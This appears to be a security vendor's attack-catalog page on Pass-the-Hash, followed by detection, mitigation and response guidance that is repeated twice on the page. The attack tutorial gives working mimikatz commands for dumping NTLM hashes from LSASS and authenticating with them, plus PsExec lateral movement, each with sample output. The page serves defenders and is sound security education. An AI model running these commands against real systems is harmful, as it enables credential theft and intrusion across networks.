Pass the Hash Attack

Credential Theft
Defense Evasion
Endpoint
Lateral Movement

Once an adversary has gained a foothold in the network, their tactics shift to compromising additional systems and obtaining the privileges they need to complete their mission. Pass-the-Hash is a credential theft and lateral movement technique in which an attacker abuses the NTLM authentication protocol to authenticate as a user without ever obtaining the account’s plaintext password. Since the attacker uses the password hash, which normally changes only when the password itself is changed, the adversary has significant time to abuse the compromised account.

Threat Summary
Target:
LM and NTLM-enabled Windows endpoints
ATT&CK® Tactic:
ATT&CK Technique:
Difficulty
Detection:
Hard
Mitigation:
Hard
Response:
Medium

Attack Tutorial: How a Pass the Hash Attack Works

STEP 1

Steal password hashes

An adversary who has gained a foothold in a network can use any of multiple methods to obtain password hashes, including DCSync attacks and extracting hashes from NTDS.dit.  Another method, shown below, is to extract password hashes from the LSASS.exe process memory, which stores hashes for users with active sessions to the computer. Note that this technique requires the adversary to have compromised administrative privileges to the computer (e.g., by enticing a user who is an administrator on the workstation to open a phishing email).
PS> .\mimikatz.exe "privilege::debug" "log passthehash.log" "sekurlsa::logonpasswords"
 
Authentication Id : 0 ; 302247 (00000000:00049ca7)
Session           : RemoteInteractive from 2
User Name         : joed
Domain            : DOMAIN
Logon Server      : DC1
Logon Time        : 09/07/2020 10:31:19
SID               : S-1-5-21-3501040295-3816137123-30697657-1109
        msv :
         [00000003] Primary
         * Username : joed
         * Domain   : DOMAIN
         * NTLM     : eed224b4784bb040aab50b8856fe9f02
         * SHA1     : 42f95dd2a124ceea737c42c06ce7b7cdfbf0ad4b
         * DPAPI    : e75e04767f812723a24f7e6d91840c1d
        tspkg :
        wdigest :
         * Username : joed
         * Domain   : DOMAIN
         * Password : (null)
        kerberos :
         * Username : joed
         * Domain   : domain.com
         * Password : (null)
        ssp :
        credman :
STEP 2

Authenticate using a stolen password hash

Next, the adversary uses one of the stolen password hashes to authenticate as a user using the Pass the Hash technique. The example below demonstrates using the stolen password hash to launch cmd.exe; it is also possible to pass the hash directly over the wire to any accessible resource permitting NTLM authentication.

To pass-the-hash using mimikatz sekurlsa::pth, the following parameters are specified:
  • /user: — The compromised user’s username
  • /domain: — The FQDN of the domain (if using a domain account) or “.” (if using a local account)
  • /ntlm:, /aes128: or /aes256: — The stolen NTLM, AES-128 or AES-256 password hash
PS> .\mimikatz.exe "sekurlsa::pth /user:JoeD /domain:domain.com /ntlm:eed224b4784bb040aab50b8856fe9f02"
 
user    : JoeD
domain  : domain.com
program : cmd.exe
impers. : no
NTLM    : eed224b4784bb040aab50b8856fe9f02
  |  PID  11560
  |  TID  10044
  |  LSA Process is now R/W
  |  LUID 0 ; 58143370 (00000000:0377328a)
  \_ msv1_0   - data copy @ 000001AE3DDE8A30 : OK !
  \_ kerberos - data copy @ 000001AE3DECE9E8
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 000001AE3DFEC428 (32) -> null
 
# New CMD Window Opens
STEP 3

Access other resources

Finally, the adversary can use their newly acquired privileges to further their objectives. The example below shows how they can use the PSExec tool to execute commands on remote systems in order expand their footprint and repeat the cycle of credential theft and lateral movement on an ever-growing number of systems.

PS> .\PSExec.exe \\server1 cmd.exe
 
PsExec v2.2 - Execute processes remotely
Copyright (C) 2001-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
 
 
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.
 
C:\Windows\system32>hostname
server1

Detect, Mitigate and Respond

Detect
Mitigate
Respond
Difficulty: Hard
Because NTLM authentication is processed by each workstation and server, pass-the-hash can be challenging for organizations to detect, as each endpoint needs to be monitored for suspicious activity.
  • Monitor NTLM authentications (particularly for remote connections) for changes in patterns of user behavior, for example: a user accessing a larger number of endpoints than normal; or, a user accessing endpoints for the first time.
  • In order to extract hashes from an endpoint's LSASS.exe process, the malware would need to obtain a handle with the PROCESS_VM_OPERATION and PROCESS_VM_WRITE privileges. Endpoint Detection and Response solutions can monitor for processes creating suspicious handles.
  • Extracting hashes from Active Directory requires administrative privileges and use of other techniques like DCSync and extracting hashes from NTDS.dit. Detection of these techniques is discussed on their Attack Catalog pages.
Difficulty: Hard
Because pass-the-hash abuses features of the NTLM protocol it cannot be entirely eliminated. However, there are solutions that can make it harder for adversaries to compromise hashes or restrict their ability to use those hashes to move laterally.
  • Enable Microsoft's Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
  • Remove users' administrator privileges from their workstations, limiting an adversaries ability to execute malware and removing the privileges needed to extract hashes from LSASS.exe.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces a credential's value to an adversary seeking to use it for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that a compromised credential can be used by an adversary to escalate privileges.
  • Randomize and store local administrator passwords using a solution like Microsoft's Local Administrator Password Solution (LAPS). This reduces an adversary's ability to move laterally with local accounts that share the same password.
  • Do not permit local accounts to authenticate over the network. This reduces an adversary's ability to move laterally with local accounts that share the same password. Two new well-known SIDS were added in Windows 8.1 and Windows 2012R2 and can be used in group policies for this purpose. The SID S-1-5-113 will apply to any local account, while the SID S-1-5-114 will apply to any local account that is also a member of the local Administrators group.
  • Add privileged domain accounts to the Protected Users group to reduce credential theft risks.
  • Configure a host-based firewall (like Windows Defender Firewall) to control and limit which hosts can communicate with which other. For example, in most environments, workstations have little need to communicate directly with other workstations. Using a host-based firewall to block this traffic can limit lateral movement.
Difficulty: Medium
If you detect a possible use of Pass the Hash, take the following actions immediately:
  • Activate the incident response process and alert the response team.
  • Reset the password for the compromised user, which makes the stolen password hash invalid.
  • Quarantine the impacted machines for forensic investigation and eradication and recovery activities. Analyze logs to determine whether this computer is patient zero or the attacker pivoted to this machine from elsewhere, as well as whether the attacker pivoted from this machine to another one.

Detect
Difficulty: Hard
Because NTLM authentication is processed by each workstation and server, pass-the-hash can be challenging for organizations to detect, as each endpoint needs to be monitored for suspicious activity.
  • Monitor NTLM authentications (particularly for remote connections) for changes in patterns of user behavior, for example: a user accessing a larger number of endpoints than normal; or, a user accessing endpoints for the first time.
  • In order to extract hashes from an endpoint's LSASS.exe process, the malware would need to obtain a handle with the PROCESS_VM_OPERATION and PROCESS_VM_WRITE privileges. Endpoint Detection and Response solutions can monitor for processes creating suspicious handles.
  • Extracting hashes from Active Directory requires administrative privileges and use of other techniques like DCSync and extracting hashes from NTDS.dit. Detection of these techniques is discussed on their Attack Catalog pages.
Mitigate
Difficulty: Hard
Because pass-the-hash abuses features of the NTLM protocol it cannot be entirely eliminated. However, there are solutions that can make it harder for adversaries to compromise hashes or restrict their ability to use those hashes to move laterally.
  • Enable Microsoft's Windows Defender Credential Guard. Introduced in Windows 10 and Windows Server 2016, Credential Guard builds on top of virtualization to protect credential storage and only permit trusted processes to access them.
  • Remove users' administrator privileges from their workstations, limiting an adversaries ability to execute malware and removing the privileges needed to extract hashes from LSASS.exe.
  • Do not allow users to possess administrative privileges to a large number of endpoints. This greatly reduces a credential's value to an adversary seeking to use it for lateral movement.
  • Do not allow users to possess administrative privileges across security boundaries. This greatly reduces the risk that a compromised credential can be used by an adversary to escalate privileges.
  • Randomize and store local administrator passwords using a solution like Microsoft's Local Administrator Password Solution (LAPS). This reduces an adversary's ability to move laterally with local accounts that share the same password.
  • Do not permit local accounts to authenticate over the network. This reduces an adversary's ability to move laterally with local accounts that share the same password. Two new well-known SIDS were added in Windows 8.1 and Windows 2012R2 and can be used in group policies for this purpose. The SID S-1-5-113 will apply to any local account, while the SID S-1-5-114 will apply to any local account that is also a member of the local Administrators group.
  • Add privileged domain accounts to the Protected Users group to reduce credential theft risks.
  • Configure a host-based firewall (like Windows Defender Firewall) to control and limit which hosts can communicate with which other. For example, in most environments, workstations have little need to communicate directly with other workstations. Using a host-based firewall to block this traffic can limit lateral movement.
Respond
Difficulty: Medium
If you detect a possible use of Pass the Hash, take the following actions immediately:
  • Activate the incident response process and alert the response team.
  • Reset the password for the compromised user, which makes the stolen password hash invalid.
  • Quarantine the impacted machines for forensic investigation and eradication and recovery activities. Analyze logs to determine whether this computer is patient zero or the attacker pivoted to this machine from elsewhere, as well as whether the attacker pivoted from this machine to another one.

MITRE ATT&CK® and ATT&CK® are registered trademarks of The MITRE Corporation.